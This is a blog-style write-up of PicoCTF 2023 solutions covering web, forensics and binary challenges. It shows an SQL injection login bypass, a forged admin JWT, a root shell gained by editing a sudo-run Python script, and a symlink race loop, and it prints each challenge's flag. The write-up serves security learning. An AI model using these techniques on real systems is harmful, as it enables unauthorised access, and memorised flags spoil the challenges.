Post

PicoCTF 2023

Posted Updated
By
5 min read
PicoCTF 2023

Web - findme

View the request through Burp picoCTF{proxies_all_the_way_be716d8e}

Web - More SQL

Use burp for this one, otherwise you miss the flag. In the login request use `x’ OR 1=1 –’ to do an authentication bypass. The flag gets printed in the response.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

POST / HTTP/1.1
Host: XXX
User-Agent: XXX
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: XXX
Connection: close
Referer: XXX
Cookie: XXX
Upgrade-Insecure-Requests: 1

username=admin&password=x' or 1=1 --

picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_e3e46aae}

Web - Java Code Analysis

/books

1

{"type":"SUCCESS","payload":[{"id":3,"title":"Little Brother","desc":"Little Brother is a novel by Cory Doctorow, published by Tor Books. It was released on April 29, 2008. The novel is about four teenagers in San Francisco who, in the aftermath of a terrorist attack on the San Francisco–Oakland Bay Bridge and BART system, defend themselves against the Department of Homeland Security's attacks on the Bill of Rights.","role":"Free"},{"id":4,"title":"The Future of the Internet and How to Stop It","desc":"The Future of the Internet and How to Stop It is a book published in 2008 by Yale University Press and authored by Jonathan Zittrain. The book discusses several legal issues regarding the Internet.","role":"Premium"},{"id":5,"title":"Flag","desc":"You need to have Admin role to access this special book!","role":"Admin"}]}

SecretGenerator

1
2
3
4

private String generateRandomString(int len) {
    // not so random
    return "1234";
}

use jwt.io to decode the authorization header in the request to get the secret pdf GET /base/books/pdf/5 HTTP/1.1

change role, userid and email to admin

1
2
3
4
5
6
7
8

{
  "role": "Admin",
  "iss": "bookshelf",
  "exp": 1679686364,
  "iat": 1679081564,
  "userId": 2,
  "email": "admin"
}

picoCTF{w34k_jwt_n0t_g00d_d7c2e335}

Forensics - hideme

You get an image called flag.png Running binwalk shows us that there is an image hidden in this flag.png binwalk -e flag.png extracts secret/flag.png

Flag: picoCTF{Hiddinng_An_imag3within@n_ima9e_85e04ab8}

Forensics - PcapPoisining

You get a pcap file In Wireshark, search by Packet Bytes, Regular expression, picoCTF{.*}

Forensics - Who is it

You get an .eml file, open the .eml file with a text editor. Find the IP address of the mail server this mail has been sent from: Received: from mail.onionmail.org (mail.onionmail.org. [173.249.33.206])

Search on whois.com for this IP.

1
2
3
4
5
6
7
8

person:         Wilhelm Zwalina
address:        Contabo GmbH
address:        Aschauer Str. 32a
address:        81549 Muenchen
phone:          +49 89 21268372
fax-no:         +49 89 21665862
nic-hdl:        MH7476-RIPE
mnt-by:         MNT-CONTABO

picoCTF{WilhelmZwalina}

Forensics - FindandOpen

Analysing the pcap file, in the ethernet traffic we find a base64 encoded string ´VGhpcyBpcyB0aGUgc2VjcmV0OiBwaWNvQ1RGe1IzNERJTkdfTE9LZF8=´. This gives the password for the zip with the full flag.

picoCTF{R34DING_LOKd_fil56_succ3ss_cbf2ebf6}

General - Chrono

picoplayer@challenge:~$ cat /etc/crontab picoCTF{Sch3DUL7NG_T45K3_L1NUX_d83baed1}

General - useless

picoplayer@challenge:~$ man useless picoCTF{us3l3ss_ch4ll3ng3_3xpl0it3d_7065}

Binary Exploitation - hijack

Python script in the home directory has root permissions, we use it to spawn a root shell and get the flag. sudo -l

1
2
3
4
5
6

 Matching Defaults entries for picoctf on challenge:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User picoctf may run the following commands on challenge:
    (ALL) /usr/bin/vi
    (root) NOPASSWD: /usr/bin/python3 /home/picoctf/.server.py

Modify .server.py script to spawn a shell os.system("/bin/sh")

Execute the python script as root: sudo -u root /usr/bin/python3 /home/picoctf/.server.py

1
2
3
4
5
6
7
8
9
10
11
12
13

Spawning root shell...
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -lah
total 12K
drwx------ 1 root root   23 Mar 16 02:09 .
drwxr-xr-x 1 root root   51 Mar 27 05:46 ..
-rw-r--r-- 1 root root 3.1K Dec  5  2019 .bashrc
-rw-r--r-- 1 root root   43 Mar 16 02:09 .flag.txt
-rw-r--r-- 1 root root  161 Dec  5  2019 .profile
# cat .flag.txt
picoCTF{pYth0nn_libraryH!j@CK!n9_0083cb0b}

Flag: picoCTF{pYth0nn_libraryH!j@CK!n9_0083cb0b}

General - Specialer

A restricted shell is spawn, after some trial and error we find out only echo and some basic syntax is allowed.

We can for loop over the directories to get the listing of files and directories, as ls isn’t allowed, with for entry in "directory_here"/*; do echo "$entry"; done

1
2
3
4
5

Specialer$ for entry in "/home/ctf-player/"/*; do echo "$entry"; done
/home/ctf-player//abra
/home/ctf-player//ala
/home/ctf-player//echo
/home/ctf-player//sim

There are a bunch of txt files in these directories, while going through them and reading the content via echo "$(<file_here.txt)". We find the flag:

1
2

Specialer$ echo "$(</home/ctf-player/ala/kazam.txt)"
return 0 picoCTF{y0u_d0n7_4ppr3c1473_wh47_w3r3_d01ng_h3r3_c42168d9}

Forensics - MSB

https://github.com/Pulho/sigBits/blob/master/sigBits.py

1

`python3 sigBits.py --type=Msb  Ninja-and-Prince-Genji-Ukiyoe-Utagawa-Kunisada.flag.png`

Output

1

has done what was commanded himin going to present himself before my lady Dulcinea del Toboso, he willhave done all that he was bound to do, and does not deserve furtherpunishment unless he commits some new offence."picoCTF{15_y0ur_que57_qu1x071c_0r_h3r01c_06326238}"Thou hast said well and hit the point," answered Don Quixote; and so Irecall the oath in so far

Binary - Tic-Tac

This challenge is about race conditions. The cpp program only can read files if they are the owner of the user executing this program. Create an empty file that the user owns

touch myfile

Setup a look that will iterate between creating a symlink to the flag.txt and our owned file. We hit the sweet spot where:

  • The textreader perfoms the user check, our symlink link is linked to our owned file myfile
  • Afterwards when the textreader reads the file, our symlink link is linked to the root owned file flag.txt We let this script run in the background (&)

while true; do ln -sf flag.txt link; ln -sf myfile link; done &

Setup a look to constantly try to read our symlink link

1
2
3
4
5
6
7
8
9
10
11
12

ctf-player@pico-chall$ while true; do ./txtreader link; done
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
picoCTF{ToctoU_!s_3a5y_5748402c}
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
picoctf, ctf
linux-jailbreak sql-injection jwt race-condition web forensics binary-exploitation
This post is licensed under CC BY 4.0 by the author.